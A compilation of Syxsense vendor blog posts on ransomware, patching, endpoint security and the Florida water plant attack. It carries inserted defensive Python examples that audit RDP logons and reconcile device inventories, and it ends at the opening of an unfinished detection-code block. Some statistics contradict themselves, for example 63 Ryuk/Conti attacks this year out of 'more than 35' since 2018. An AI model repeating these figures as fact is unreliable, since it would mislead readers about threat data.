Tag: cybersecurity

3 Ways to Greatly Reduce Cyber Risk


With the rise of ransomware and an endless stream of patches in 2021, it takes reliable best practices to reduce your cyber risk exposure.


Report Reveals the Rise of Ransomware and Importance of the Human Element

The Verizon Data Breach Investigations Report is eagerly awaited each year. It provides a window into the world of global trends in security. This year’s analysis looked into 79,635 incidents around the world, of which 5,258 were confirmed data breaches.

Social engineering (primarily phishing) came up as the top avenue of incursion used in breaches. More than 30% of incidents stemmed from it, while web application attacks accounted for around 25% and system intrusions scored almost 20%.

Not surprisingly, 85% of breaches included a human element, with 61% involving credentials and 13% containing ransomware. About 10% of the ransomware attacks cost organizations an average of about $1 million – whether from paying the ransom, remediation, or lost revenue.

Ransomware = Organized Crime

Organized crime is now behind four out of five breaches. In other words, the days of the lone hacker-genius-student sitting in an attic breaking into big government systems are behind us. These days, criminals are most often involved and their goal is money – as much as possible per breach. Yes, there is a little espionage going on, and perhaps a few lone wolves showing off their hacking prowess. But by and large, we are now dealing squarely with cybercriminals motivated by money and extortion.

The Verizon report emphasizes how hackers now use automation to quickly zero in on ripe areas.

“It’s important to limit your public facing attack surface, through asset management, defensive boundaries and intelligent patching.”

Another important finding is that it is not new vulnerabilities that cause the most trouble. It is old, unmitigated holes and vulnerabilities that are the most exploited.

“One might think that more recent vulnerabilities would be more common. However, as we saw last year, it is actually the older vulnerabilities that are leading the way. These older vulnerabilities are what the attackers continue to exploit.”

They give the example of the Microsoft Exchange Remote Code Execution Vulnerability (CVE-2021-26855), which is being actively and massively exploited. Despite Microsoft issuing warning after warning, patches having been available for months, and a barrage of news stories about the problem, organizations continue to be attacked because they have not fixed it.

That’s why Verizon analysts criticize the inability of IT teams to keep up with the deployment of patches.

“The patching performance this year in organizations has not been stellar. Granted, it’s never been great.”

How to Greatly Reduce Cyber Risk

Those wishing to greatly reduce cyber risk, therefore, are advised to institute three practices.

  1. Institute security awareness training to educate users about the many tricks and strategies of social engineering. Use this training to harden them against phishing and other scams.
  2. Automate patch management: Eliminate internal procedures that slow the deployment of patches. Instead of relying on someone in IT to review, test, and determine when and if a patch should be deployed, add automation to the process.
  3. Conduct regular vulnerability scans to detect systems, apps, and devices that offer a potential pathway into the enterprise.

How Syxsense Can Help

Syxsense provides the answer to practices 2 and 3 above. It combines automated patch management with vulnerability scanning and IT management to eliminate risk and plug the holes cybercriminals use to deliver ransomware and other forms of attack.


Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.


Top 5 Security Trends of 2021


Gartner recently released a list of the top security trends. How have things changed since COVID-19 hit and what actions should you take?


Top IT Security Trends of the Year

Gartner recently released a list of the top security trends. How have these changed since COVID-19 hit? What new trends have emerged? Which old ones remain as persisting challenges?

Here are some of the key ones noted in the report.

1. Staffing

Filling positions with skilled security personnel was a problem long before COVID-19 hit. And it remains a major issue today.

“The first challenge is a skills gap,” said Gartner Analyst Peter Firstbrook. “80% of organizations tell us they have a hard time finding and hiring security professionals and 71% say it’s impacting their ability to deliver security projects within their organizations.”

2. Remote Work

Gartner surveys show that as many as 40% of employees will continue to work from home post-COVID-19. Thus, the additional support and security measures that have been implemented for remote work since March of 2020 will have to be continued indefinitely. Not only that, security personnel will have to deal with some people working only in the office, some only from home, and many combining both.

A further wrinkle is that many offices are taking the opportunity to downsize. One example is an organization of 100 that is planning to have personnel work three days per week in the office. This means that 60 will be onsite at any one time. To address this change, office space is being reduced. Standard cubicles are being dispensed with and employees will be asked to hook up their laptops to available spaces.

Therefore, security staff will have to get used to new patterns of operation, revise policies and best practices, and implement new tools to deal with a more fluid workplace.

3. Identity First Security

Gartner defines identity first security as an approach that places identity front and center in security design. Instead of a disparate set of tools and applications, each with their own security methods, user identity becomes the key to accessing everything from anywhere on any device.

This includes being able to monitor authentication centrally across the enterprise, not just implementing point tools related to multi-factor authentication, single sign-on, or biometric authentication. Organizations will have to evaluate the value of buying new software and systems to implement identity first security against the desire to maximize earlier investments in point tools.

4. Tool Sophistication Grows

Cybercriminals have upped their game. The recent SolarWinds and Microsoft Exchange Server hacks demonstrate the extent, and the depth, to which networks can rapidly be compromised. Therefore, security vendors have been forced to raise their game too, with new technologies such as breach and attack simulation (BAS) tools.

BAS is all about continuously assessing the defensive posture of the organization rather than relying on occasional penetration tests to determine potential areas of exposure. The logic behind this is: why conduct penetration tests on a quarterly or annual basis when you can be doing it virtually all the time?

5. Vendor Consolidation

The modern-day security toolkit contains way too many individual elements. A Gartner survey of CISOs found that 78% have 16 or more cybersecurity tools. Incredibly, as many as 12% of organizations have 46 or more security applications. That’s bad news for IT as they have to integrate, correlate, manage and maintain all those systems. They have had enough of hopping from console to console to fix one issue or another. It is no wonder that mistakes happen and breaches occur.

An emerging element of strategy, therefore, is to consolidate toolkits to encompass a smaller set of vendors. The advantages include ease of implementation, stronger integration, and lowered costs. That’s why 4 out of 5 CISOs intend to consolidate vendors over the next three years.

“Having fewer security solutions can make it easier to properly configure them and respond to alerts, improving your security risk posture,” said Firstbrook.

Enhance Your IT Management and Security

Syxsense Secure is a patch management platform that includes IT management and vulnerability scanning in one console. It not only shows you what’s wrong, but also deploys the solution.

Gain visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience with automated patching and security scans.



The Number of Ransomware Victims is Greatly Underreported


It seems hard to believe that ransomware data is underreported. However, reports claim the numbers run far below the actual totals.


Is the number of ransomware victims accurate?

It seems hard to believe that ransomware numbers are underreported. After all, hardly a week goes by without news of another high-profile victim. And most days, there is news of a small business being locked out of its systems.

Yet the eSentire Ransomware Report claims the official numbers run far below the actual totals. The report said that six primary ransomware gangs managed to compromise almost 300 organizations in the first four months of 2021. Researchers estimate that their haul came to close to $50 million and believe that many more victims pay up and manage to avoid publicity.

Their reasons for keeping quiet vary. Some hope to avoid damage to their brand reputation. Another motivation might be maintenance of share price or seeking to avoid publicity that might endanger massive financial deals about to close.

Ransomware Gang Territories

The report estimates that the various groups involved split the booty between them. Each has a different specialty: according to the report, each gang focuses on particular industries and regions of the world.

The mob behind the Colonial Pipeline attack is known as DarkSide. In the first six months of their existence, they have managed to impact about 100 organizations. Their business model is that of ransomware-as-a-service. They provide freelancers and contractors with tools to infiltrate corporate defenses and then get a cut of the ransom.

The good news is that increased law enforcement scrutiny caused DarkSide to shut down and go underground, at least temporarily. Energy providers have become something of a specialty for DarkSide, with Brazilian electric utility Companhia Paranaense de Energia also held to ransom this year.

Another growing gang is Ryuk/Conti. It has attacked more than 35 organizations since 2018. 63 of them took place this year. Instead of going after energy and infrastructure, their preference is manufacturing, construction, transportation, education, and local government. Recent victims include Broward County School District, CEE Schisler, and government systems in Georgia, Florida, and Indiana. Three of the local governments paid the ransoms (anywhere from $130,000 to $600,000), but the others did not.

Like the Ryuk/Conti gang, the people behind the Sodin/REvil ransomware focus on healthcare organizations while also devoting their efforts to attacking laptop manufacturers. Of their 161 victims, 52 were hit in 2021 and they made international news with attacks on Acer and Quanta, two of the world’s biggest technology manufacturers.

Stern Warning on Ransomware

The eSentire report includes a stern warning:

“Another sobering realization is that no single industry is immune from this ransomware scourge. These debilitating attacks are happening across all regions and all sectors, and it is imperative that all companies and private-sector organizations implement security protections to mitigate the damages stemming from a ransomware attack.”

That includes ensuring all vital patches have been deployed on every server and endpoint, and that no hidden vulnerabilities exist for hackers to exploit.


Would Hamlet Pay a Ransom?


The FBI strongly advises companies to never pay when ransomware strikes. So why do organizations continue to do so in the face of an attack?


Hamlet once pondered, “To be, or not to be. That is the question.”

If the Prince of Denmark lived in the modern world, he would more likely be pondering the impact of ransomware on his kingdom, saying, “To pay, or not to pay. That is the question.”

Government and justice officials are clear about their opinion. The FBI strongly advises companies to never pay a ransom. It is quite possible that the Justice Department will start fining anyone found to have paid a ransom. Similarly, the UK Home Security has publicly stated that the government doesn’t support victims of ransomware attacks paying the ransom.

Their logic is simple. Paying the bad guys the money just tells them that ransomware is a great way to accumulate cash. Further, who is to say that the cybercriminals will decrypt organizational files once the ransom is paid?

Remember all those movie plot lines where the blackmailer keeps coming back for more and more money? The same thing can and has happened in ransomware attacks. When you are dealing with a criminal, there is never any guarantee that they’ll keep their word.

Another ploy used by the bad guys is to threaten to publicly reveal sensitive or embarrassing data or intellectual property (IP) to the world at large if a large sum is not paid. Even if a ransom is paid, there is still a possibility the criminals will cash in again by quietly passing such data onto a competitor or a journalist – for a fee, of course.

Finally, if hackers have been inside your network, how sure can you be that they haven’t left some form of malware lurking inside? Perhaps a back door, or a way to siphon off money quietly. It is no easy task to ransack every nook and cranny of the enterprise to find malware and vulnerabilities.

As Hamlet said, “Though this be madness, yet there is method in’t.”

Why Some Pay the Ransom

Colonial Pipeline recently paid almost $5 million. The logic in that action seems clear. It would cost the company far more in potential revenue losses than the ransom demand. Revenue loss is often what motivates payment.

But in local government, healthcare, and education hacks, what drives payment may be something different: the need to restore vital services. Hospitals need access to care for their patients, after all.

Anyone paying a ransom may be subject to government fines. Currently, that is only a threatened action. But with many countries running in heavy deficit, fining organizations for submitting to ransom demands may be seen as another way to fill up the coffers.

How Will the Cybercriminals Respond?

If governments continue the rhetoric about not paying, and fines begin to be issued, more and more organizations will resist the temptation to pay the requested ransom.

The Irish national healthcare service, for example, is currently in a standoff with hackers who have locked it out of many healthcare and social service systems. Ongoing mitigation efforts include shutting down all computer systems, isolating those that were attacked, then wiping, rebuilding and updating all infected devices, updating antivirus and other security apps, and recovering systems using offsite backups.

If refusal to pay becomes a trend, the ball falls into the court of the criminals. How will they respond? In the old days, anyone failing to pay protection money would see their store vandalized, a family member brutalized, or would become the victim of an arson attack. The cyber-equivalent of some of these would seem to be the obvious response. Time will tell.

The best approach, though, is to be vigilant in doing everything you can to prevent the possibility of a ransomware attack. Patch all systems, keep an eagle eye for potential vulnerabilities, and act whenever one is found.

As Hamlet said, and he might even have been talking about cybercriminals, “Let the doors be shut upon him, that he may play the fool nowhere but in’s own house.”

Find out more about Syxsense, the only tool that combines automated patch management, vulnerability scanning, and IT management.


How Syxsense Would Respond to the Florida Water Poisoning Attack


After the attempted water poisoning cyberattack in Florida, cybersecurity experts are advising IT departments to take action.


Hackers Attempt Poisoning in Florida

Last week an unidentified attacker gained access to a water treatment plant’s network and modified chemical dosages to dangerous levels.

The FBI issued an alert on Tuesday, drawing attention to three security issues seen on the plant’s network following last week’s hack. In such cases, the FBI recommends a series of basic security best practices as an interim way to mitigate threats.

Using Syxsense Secure, you can verify your governance against these FBI recommendations, along with resolving any issues discovered as part of this vulnerability scanning exercise.

Rob Brown, Chief Customer Success Officer at Syxsense said, “Obsolete software or unpatched devices provide one of the most serious concerns to the Security Chiefs of companies worldwide. Many of our customers are saying the unpatched laptop may become the next big weaponized threat. They are using Syxsense Secure with the hyper-automation of Syxsense Cortex to return their users safely to the office or isolate those devices if they are unsafe.”

The FBI Recommendations

1. Use multi-factor authentication

Syxsense Manage and Syxsense Secure can be enabled with multi-factor (two-factor) authentication. Syxsense supports both email and an authenticator app, such as Google and DUO.

In addition, other security settings are enabled by default, such as email notifications upon login to the console and auto logout following a period of inactivity. Whitelisting is an option for anyone using a static IP address, and geographical protection can be enabled to restrict access to your Syxsense console based on country.

2. Use strong passwords to protect Remote Desktop Protocol (RDP) credentials

With Syxsense Cortex, you can discover all systems with Remote Desktop Protocol enabled without the required “strong passwords”. Syxsense Cortex can detect and notify through email any systems which do not meet this requirement.

3. Ensure anti-virus, spam filters, and firewalls are up to date, properly configured, and secure

The Syxsense Secure vulnerability scanner can provide an independent audit of the health and status of the most popular anti-virus and anti-spyware programs and, where needed, update those systems automatically to protect the devices.

4. Audit network configurations and isolate computer systems that cannot be updated

Based on the detected vulnerable status of devices, Syxsense Cortex can automatically quarantine the device, isolating it from the network and preventing the device from being a threat.

The device can still be managed using Syxsense Secure, meaning you can still perform software deployment, patch management, vulnerability management or remote access whilst isolated.

5. Audit your network for systems using RDP, closing unused RDP ports, applying two-factor authentication wherever possible, and logging RDP login attempts

Syxsense Secure scans for many types of ports. Based on those detected, you can report on the devices or take action, such as enabling local firewalls or reconfiguring the operating system using Windows PowerShell.

6. Audit logs for all remote connection protocols

Syxsense Secure provides real-time access to the Windows Application, Event, System and Security event logs.

7. Train users to identify and report attempts at social engineering

From customizing computer desktop backgrounds to customizable end-user message prompts, Syxsense Secure and Syxsense Cortex can help users avoid mistakes at the endpoint. All tasks performed by Syxsense can use a corporate logo and custom messages.

8. Identify and suspend access of users exhibiting unusual activity

Untrusted applications, untrusted processes, or multiple login attempts can trigger automatic disabling of local accounts and email alerts to automated helpdesk systems. Syxsense Secure comes with a built-in alerting system so that you never miss them.

9. Keep software updated

Syxsense supports Windows, Mac OS, Linux, and the most common third-party applications.

Whether your devices are local, remote, or at home, you can trust Syxsense to update your software or notify you when obsolete software has been found.
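Recommendations 5, 6 and 8 above all come down to reading Windows Security log records for RDP logons and acting on them. The following is an added example, not code from the original post or from the Syxsense product: it parses constructed sample records (event IDs 4624/4625 and logon type 10 are the real Windows values, the records themselves are made up for the example), lists successful RDP logons for audit, and flags an account/source pair with a burst of failed RDP logons, noting whether a success followed the burst.

```python
"""Audit RDP logon activity from Windows Security event records.

Added example, not part of the original post or the Syxsense product.
Event IDs 4624 (logon succeeded) and 4625 (logon failed) are the real
Windows Security log IDs; logon type 10 (RemoteInteractive) is the RDP
logon type. The records are constructed for this example, in a
simplified "timestamp|event_id|logon_type|account|source_ip" form.
"""
from collections import defaultdict
from datetime import datetime, timedelta

EVENT_LOGON_OK = 4624
EVENT_LOGON_FAILED = 4625
LOGON_TYPE_RDP = 10  # RemoteInteractive: Terminal Services / RDP

# Constructed sample log: one burst of failed RDP logons for "admin" from
# 203.0.113.7 that ends in a successful logon, plus routine noise.
SAMPLE_EVENTS = """\
2021-05-18T08:00:01|4624|10|jdoe|10.0.0.25
2021-05-18T08:00:04|4625|10|admin|203.0.113.7
2021-05-18T08:00:10|4625|10|admin|203.0.113.7
2021-05-18T08:00:15|4625|10|admin|203.0.113.7
2021-05-18T08:00:22|4625|10|admin|203.0.113.7
2021-05-18T08:00:31|4625|10|admin|203.0.113.7
2021-05-18T08:00:40|4625|10|admin|203.0.113.7
2021-05-18T08:01:00|4624|10|admin|203.0.113.7
2021-05-18T08:02:00|4625|3|svc-backup|10.0.0.9
2021-05-18T08:03:00|4624|2|mlee|127.0.0.1
2021-05-18T08:30:00|4625|10|jdoe|10.0.0.25
"""


def parse_events(text):
    """Parse the simplified records into dicts with typed fields."""
    events = []
    for line in text.strip().splitlines():
        ts, event_id, logon_type, account, source_ip = line.split("|")
        events.append({
            "time": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "account": account,
            "source_ip": source_ip,
        })
    return events


def rdp_events(events):
    """Keep only RemoteInteractive (RDP) logons; network (type 3) and local
    console (type 2) logons are out of scope for an RDP audit."""
    return [e for e in events if e["logon_type"] == LOGON_TYPE_RDP]


def rdp_successes(events):
    """Every successful RDP logon as (account, source_ip), for the
    'audit logs for all remote connection protocols' recommendation."""
    return [(e["account"], e["source_ip"])
            for e in rdp_events(events) if e["event_id"] == EVENT_LOGON_OK]


def detect_rdp_bursts(events, threshold=5, window_minutes=5):
    """Flag (account, source_ip) pairs with at least `threshold` failed RDP
    logons inside a sliding window, and record whether a successful logon
    followed the burst, which is the case that warrants suspending access."""
    window = timedelta(minutes=window_minutes)
    failures = defaultdict(list)
    successes = defaultdict(list)
    for e in rdp_events(events):
        key = (e["account"], e["source_ip"])
        if e["event_id"] == EVENT_LOGON_FAILED:
            failures[key].append(e["time"])
        elif e["event_id"] == EVENT_LOGON_OK:
            successes[key].append(e["time"])

    findings = []
    for key, times in failures.items():
        times.sort()
        best = None  # densest qualifying window as (count, first, last)
        j = 0
        for i, start in enumerate(times):
            # Advance j past every failure inside [start, start + window].
            while j < len(times) and times[j] - start <= window:
                j += 1
            count = j - i
            if count >= threshold and (best is None or count > best[0]):
                best = (count, start, times[j - 1])
        if best is None:
            continue
        count, first, last = best
        followed = any(first <= s <= last + window for s in successes[key])
        findings.append({
            "account": key[0],
            "source_ip": key[1],
            "failures": count,
            "first": first.isoformat(),
            "last": last.isoformat(),
            "followed_by_success": followed,
        })
    return findings


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    for acct, ip in rdp_successes(evts):
        print(f"RDP logon: {acct} from {ip}")
    for f in detect_rdp_bursts(evts):
        print(f"ALERT: {f['failures']} failed RDP logons for {f['account']} "
              f"from {f['source_ip']} ({f['first']}..{f['last']}); "
              f"success after burst: {f['followed_by_success']}")
```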


Experience the power of Syxsense Cortex, free for 14 days.

Syxsense Cortex is included with Syxsense Secure. Our intuitive technology helps you easily predict and remove security threats where you are most vulnerable — at the endpoint.


COVID-19 Causes Increase in Cyberattacks


As the world continues to face COVID-19 and cyberattacks increase, patch management and endpoint security are becoming more challenging for businesses and IT professionals.


Coronavirus is Leading to Growth in Cyber Attacks

As the world continues to battle COVID-19, patching and securing endpoints has become a much bigger challenge for businesses.

A recent survey from Threatpost revealed that 40% of companies reported seeing increased cyberattacks as they enable remote working.

In a joint statement, the European Commission, ENISA, and CERT-EU shared concerns about COVID-19 related vulnerabilities:

The coronavirus outbreak has spurred widespread anxiety and forced many people to work from home. Malign actors are actively exploiting these new challenging circumstances to target remote workers, businesses and individuals alike.

Relevant European Union entities are in close contact with one another to track these malicious activities, raise awareness in their respective communities and help protect confined citizens. The European Commission, ENISA, CERT-EU and Europol, among others, will continue to monitor the situation and coordinate as appropriate to ensure a safer cyberspace for the EU and the world.

Despite this call-to-action, many businesses and IT professionals are still unequipped to handle the exploits. Companies are making infrastructure changes on the fly and opening up corporate networks to potential attacks.


Proactively Protecting Your Organization

A secure, roaming product like Syxsense allows you to manage and secure vulnerabilities exposed by open ports, disabled firewalls, ineffective user account policies, and security compliance violations from remote workers.

In this unpredictable time, detecting software vulnerabilities isn’t enough. Traditional security scanners only do half the job by identifying and tracking possible vulnerabilities and exposure without eliminating the risk.

Combining security scanning and patch management in a single console, our vulnerability scanning feature not only shows you what’s wrong, but also deploys the solution. Gain visibility into OS and third-party vulnerabilities while increasing cyber resilience through automated patching and security scans. Insights into the OS misconfigurations and compliance violations reduce your attack surface and increase peace of mind.


Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.


The True Cost of DoS Attacks


There's a high price to pay for DoS attacks in 2020. With costs rapidly rising, what is the best IT security strategy?

A Denial of Service (DoS) attack can seriously derail any business with a digital presence. These attacks are still prevalent in 2020 and the cost is rapidly rising. Even a small company could lose up to $120,000 after experiencing its effects.

According to a report from Bulletproof, the price tag on a DoS attack has risen to over $2 million for enterprise companies. Defending against these threats can actively save your business money and time.

Although some instances reflect the lowering of DoS ransoms, cyber attackers are easily generating a greater impact with new strategies. As a result, budgeting for the best tools to shield your business from these attacks delivers much more upside.

The most direct result of a DoS attack is lost sales. However, DoS attacks can also be used to hide more damaging breaches of data. If sensitive customer information or financial data is lost, you may also be legally liable, which significantly increases the price of the breach.

Other indirect costs of an attack include replacing hardware, but also employee time. Many won’t be able to work until service is restored, and others who can help fix the problem will need to work overtime. You may need to hire outside help if the attack persists, and customer service people will be inundated with more calls and emails than normal.


The Best Cybersecurity Strategy for 2020

What are the best protections against DoS? Internal IT employees should ensure that all servers are publicly available only for necessary functions, and are further secured with SSH, firewalls on all endpoints, SSL, and VPNs. Plan ahead for larger traffic volumes than you think you need, and employ a smart array of vulnerability testing technology to keep uptime at 100%.

Syxsense can inspect your company’s resources on a strict schedule and will patch software and hardware in real-time to automatically protect against zero-day vulnerabilities. An inclusive approach encompassing the OS, third-party apps, firewalls, router configurations, and more ensures vigilance against all attack vectors.

Robert Brown, Director of Services at Syxsense, notes that this comprehensive patching effort is required if companies want to deflect DoS cost-effectively.

“When every minute of downtime carries a five-figure price tag, patch management moves higher on the list of priorities for businesses in 2020,” Brown said.

Syxsense allows you to manage and secure vulnerabilities exposed by open ports, disabled firewalls, ineffective user account policies, and security compliance violations from remote workers. Gain visibility into OS and third-party vulnerabilities while increasing cyber resilience through automated patch management and vulnerability scanning.


Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.


Why You Need to Manage Your Endpoints


Endpoint management is imperative today for business of all sizes. With EPP and EDR solutions available, which is the best option for your organization?


Endpoint Management is More Critical than Ever

Not every security or IT team has a confident endpoint management strategy. A recent survey of 1,000 IT professionals found that, while 88 percent of respondents acknowledged the importance of endpoint management, nearly a third didn’t know how many endpoint devices existed within their organization.

An endpoint is simply a network-capable device on a TCP/IP network. The term can refer to desktop computers, laptops, smartphones, tablets, thin clients, printers, or other specialized hardware, such as POS terminals, smart meters, HVAC control systems, thermometers, and the like. Connecting these devices to corporate networks creates attack paths for security threats. It stands to reason, then, that endpoint security is imperative today for businesses of all sizes.

EPP vs. EDR Solutions

So, how can IT and security teams go about this? It starts with the overall concept of endpoint management: the ability to centrally discover, provision, deploy, update, and troubleshoot endpoint devices within an organization.
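The survey finding above, that nearly a third of teams do not know how many endpoints they have, is a discovery problem, and discovery is the first of the capabilities just listed. As an added example (not code from this page or from Syxsense), the following Python reconciles two views of the estate: what the network currently sees, taken from an ISC `dhcpd.leases`-style file, and what the management agent reports. Both data sets are constructed, and the hostnames, MAC addresses, fixed clock and seven-day staleness threshold are assumptions you would replace with your own sources.

```python
"""Find unmanaged and silent endpoints by reconciling two inventories.

Added example for this page, not Syxsense code. Compares active DHCP leases
(what is on the network now) with the agent check-in table (what is managed).
All data below is constructed.
"""
import re
from datetime import datetime, timedelta

NOW = datetime(2020, 3, 2, 9, 0, 0)   # fixed clock so the result is repeatable
STALE_AFTER = timedelta(days=7)        # assumed: a week without check-in is suspicious

# Constructed dhcpd.leases excerpt (ISC format; "ends <weekday> <date> <time>;")
DHCP_LEASES = """\
lease 10.1.4.20 {
  starts 1 2020/03/02 07:12:00;
  ends 1 2020/03/02 19:12:00;
  hardware ethernet 3c:52:82:aa:01:10;
  client-hostname "LT-FINANCE-07";
}
lease 10.1.4.21 {
  starts 1 2020/03/02 08:40:00;
  ends 1 2020/03/02 20:40:00;
  hardware ethernet 00:1E:C0:BB:02:33;
  client-hostname "BREAKROOM-TV";
}
lease 10.1.4.22 {
  starts 4 2020/02/20 08:00:00;
  ends 4 2020/02/20 20:00:00;
  hardware ethernet 3c:52:82:aa:01:11;
  client-hostname "LT-SALES-03";
}
"""

# Constructed agent inventory: MAC -> (hostname, last check-in time)
AGENT_INVENTORY = {
    "3c:52:82:aa:01:10": ("LT-FINANCE-07", datetime(2020, 3, 2, 8, 55)),
    "3c:52:82:aa:01:11": ("LT-SALES-03", datetime(2020, 2, 18, 17, 0)),
    "3c:52:82:aa:01:12": ("LT-HR-02", datetime(2020, 1, 30, 12, 0)),
}


def active_leases(text, now=NOW):
    """Return {mac: (ip, hostname)} for leases that have not expired at `now`."""
    leases = {}
    for block in text.split("}"):
        m_ip = re.search(r"lease (\S+) \{", block)
        m_end = re.search(r"ends \d (\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2});", block)
        m_mac = re.search(r"hardware ethernet ([0-9A-Fa-f:]{17});", block)
        if not (m_ip and m_end and m_mac):
            continue
        if datetime.strptime(m_end.group(1), "%Y/%m/%d %H:%M:%S") < now:
            continue  # expired: the device is not on the network right now
        m_host = re.search(r'client-hostname "([^"]*)"', block)
        # MACs are normalised to lowercase so the two inventories can be joined
        leases[m_mac.group(1).lower()] = (m_ip.group(1), m_host.group(1) if m_host else "")
    return leases


def reconcile(leases, inventory, now=NOW, stale_after=STALE_AFTER):
    """Bucket endpoints: on the network with no agent; agent silent too long;
    on the network with a recently seen agent."""
    return {
        "unmanaged": sorted(mac for mac in leases if mac not in inventory),
        "stale_agents": sorted(mac for mac, (_, seen) in inventory.items()
                               if now - seen > stale_after),
        "managed_online": sorted(mac for mac in leases if mac in inventory),
    }


if __name__ == "__main__":
    report = reconcile(active_leases(DHCP_LEASES), AGENT_INVENTORY)
    for bucket, macs in report.items():
        print(bucket, macs)
```

On the constructed data the breakroom TV is on the network with no agent at all, and two laptops have agents that last reported more than a week ago. The first bucket is where unmanaged IoT devices and shadow IT show up; the second is where lost devices, wiped machines and broken agents show up. DHCP is only one observation source; ARP tables, switch MAC tables, 802.1X logs and cloud console exports all feed the same join on a normalised MAC or serial number.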

Such security tends to be split into two categories—albeit categories that are converging: Endpoint Protection Platforms (EPP) and Endpoint Detection & Response (EDR).

EPP is a solution deployed on endpoint devices to prevent file-based malware attacks, detect malicious activity, and provide the investigation and remediation capabilities needed to respond to dynamic security incidents and alerts.

According to Cybrary, EPP is designed to detect and block threats at the device level. To achieve this, EPP tools contain other security solutions such as:

  • Antivirus
  • Anti-malware
  • Data encryption
  • Personal firewalls
  • Intrusion prevention (IPS)
  • Data loss prevention (DLP)

Traditional EPP solutions are preventative by nature, and typically use a signature-based approach to identify threats. The latest EPP solutions have, however, evolved to utilize a broader range of detection techniques.


Antivirus Software Isn’t Enough

On the other hand, says Cybrary, “EDR tools are designed to monitor and record activity on endpoints, detect suspicious behavior, security risks, and respond to internal and external threats. You can use EDR solutions to track, monitor, and analyze data on endpoints to enhance the fortification of your environment.”

The article goes on to explain that EDR tools do not replace traditional tools such as antivirus and firewalls but, instead, work with them to provide enhanced security capabilities. Since these tools protect endpoints, they can be considered a part of a broader endpoint management concept.

“In other words,” according to Cybrary, “antivirus software only protects end-user devices while EDR provides network security by authenticating log-ins, monitoring network activities, and deploying updates.”

While the capabilities of EDR solutions vary, they all share the same primary purpose: alerting on suspicious activity and investigating threats in real time to find the root of the attack and stop it.

It might seem like the distinction between EPP and EDR is straightforward, but it is not always that simple. Traditionally, EPP is thought of as a first-line defense mechanism, effective at blocking known threats. EDR, on the other hand, is seen as the next layer of security, providing additional tools to detect threats, analyze intrusions, and respond to attacks.

The Benefits of EDR Solutions

EDR solutions tend to have four primary competencies: detect security incidents; contain the incident at the endpoint so that network traffic or process execution can be remotely controlled; investigate security incidents; and remediate endpoints to a pre-infection state. Machine-learning models, often marketed as artificial intelligence (AI), extend these four competencies by flagging anomalous behaviour for which no signature exists yet, rather than waiting for a known indicator to appear.

EDR was initially positioned as a solution for large organizations with dedicated security operations centers that could use the telemetry EDR provides to fight intrusions into their networks. Now there is a growing acceptance that EDR capabilities are a necessity for organizations of all sizes.

Of late, according to Cybrary, EDR providers have begun to incorporate aspects of EPPs into their products, and EPP providers to integrate basic EDR functionality in their solutions as well. Some companies are even now offering a more holistic security solution that combines EDR security and EPP security tools to provide both active and passive endpoint protection.

How Syxsense Can Help

Today, organizations have realized that the two solutions complement each other, and vendors, Syxsense among them, are building products accordingly. As cybersecurity threats grow, there is more pressure than ever to stay ahead of the curve.

Syxsense Secure brings together endpoint management and security for greater efficiency and collaboration between IT management and security teams. Our AI-driven threat protection gets you in front of any malicious cyberattack with the power of predictive technology.


Endpoint Security vs. Antivirus


Antivirus Software is Nice, But It’s Not Enough for Full Endpoint Security

Are your current security measures enough to protect your network’s endpoints? Explore the key differences between antivirus software and EDR tools.


As we previously pointed out in our “Endpoint Security 2020: What You Need to Know” article: “Cyberattacks are growing more complex and difficult to prevent, and this will only accelerate in the future, thus making endpoint security a top goal in 2020.” Given the news of late, there can be no doubting the importance of this.

You probably already have information-security measures in place in your organization, such as firewalls and antivirus software. But you might be wondering if what you have in place is sufficient to properly protect all of your network’s endpoints.

Unfortunately, the question, and the answers, might not be that simple. As pointed out by SolutionsReview, it's important to understand the historical significance of antivirus software. Such tools, whose origins date back more than 30 years, are the wellspring from which other, more sophisticated cybersecurity tools and techniques emerged.

The late 1980s and early 1990s marked the debut of antivirus products from developers such as Symantec, McAfee and Sophos, in addition to the founding of cybersecurity research groups such as the Computer Antivirus Research Organization.

Now, three decades later, antivirus tools are part of standard operating procedure for virtually all professional-grade desktops and laptops—as well as a considerable number of the smartphones and tablets used by enterprise staff. Plenty of consumers also use such applications.

The Inherent Limits of Antivirus Control

In the majority of cases, antivirus software sits in the background, only making its presence known when a threat is detected. While certainly valuable, it has a clear limitation: it acts only at the moment a known threat becomes visible, typically when a file is written or executed. It offers little in the way of containment or response tooling, and it lacks the broader scope of functionality available through endpoint detection and response (EDR) tools.

Additionally, many legacy antivirus programs, and even some recent versions, are limited to detecting threats for which a signature already exists. While vendors have catalogued signatures for a significant share of the malware and exploit tools used by modern attackers, plenty of samples have not been catalogued yet, and malware that is rewritten or repacked for each campaign, so that no static signature matches, is becoming increasingly common, according to TechTarget.

Perhaps most alarming of all is that many cyberattacks today eschew dropping files entirely. Instead, they use innocuous-looking links or documents to launch programs that are already present and trusted on the machine, such as Windows PowerShell (and, historically, Flash), passing the malicious logic on the command line or keeping it in memory so that nothing new is written to disk for a scanner to inspect.

As CSO explained, these collect data from the victimized machine and relay it to the hacker who originated the attack, allowing that interloper to seize further control of a device and subsequently deliver more exploits. An entire network could be devastated this way, and many antivirus tools would most likely have never seen it coming.

The Ponemon Institute’s 2018 State of Endpoint Security Report noted that 35% of that year’s malware attacks were fileless, while projecting that figure to increase to 38% for 2019. In the years to come, it’s entirely possible that fileless exploits will constitute a significant majority of the cyberattacks deployed against all businesses and public-sector organizations, leaving antivirus tools even more in the lurch.
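As an added example (not code from this page, and not Syxsense's detection logic), the following Python runs the two approaches contrasted in this post, a file-hash signature check and a small set of behavioural rules, over a constructed set of Sysmon-style process-creation events. The event fields, the "known bad" hash, the 203.0.113.7 address and the encoded PowerShell command are all constructed; the rules are deliberately minimal. It makes the point of the fileless-attack paragraphs above and of the EDR competencies discussed in the previous post: the dropper is caught by its hash, but the fileless Office-to-PowerShell chain has no file hash to match and is visible only from the parent process, the command-line flags and the decoded payload.

```python
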